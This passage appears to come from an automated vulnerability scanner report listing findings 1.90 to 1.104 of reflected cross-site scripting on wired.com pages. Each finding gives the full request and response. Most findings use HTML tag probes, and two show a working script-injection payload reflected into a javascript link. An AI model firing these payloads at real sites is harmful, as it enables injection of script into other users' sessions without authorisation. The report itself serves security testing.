User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:29 GMT
Date: Sun, 21 Nov 2010 23:06:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design4088a"><a>cab77e397f3">
...[SNIP]...

1.90. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia">
...[SNIP]...

1.91. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:19 GMT
Date: Sun, 21 Nov 2010 23:07:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia">
...[SNIP]...

1.92. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f">
...[SNIP]...

1.93. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.94. http://www.wired.com/culture/education [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec45a8"><a>9f611b39064/education HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec45a8"><a>9f611b39064 ss_education">
...[SNIP]...

1.95. http://www.wired.com/culture/education [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29261
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_educationb2c85"><a>d84992dbbe">
...[SNIP]...

1.96. http://www.wired.com/culture/lifestyle [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:04 GMT
Date: Sun, 21 Nov 2010 23:06:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle">
...[SNIP]...

1.97. http://www.wired.com/culture/lifestyle [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=588
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestylef876e"><a>59992d190ca">
...[SNIP]...

1.98. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia">
...[SNIP]...

1.99. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:37 GMT
Date: Sun, 21 Nov 2010 23:06:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia">
...[SNIP]...

1.100. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413">
...[SNIP]...

1.101. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.102. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia">
...[SNIP]...

1.103. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:36 GMT
Date: Sun, 21 Nov 2010 23:06:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia">
...[SNIP]...

1.104. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
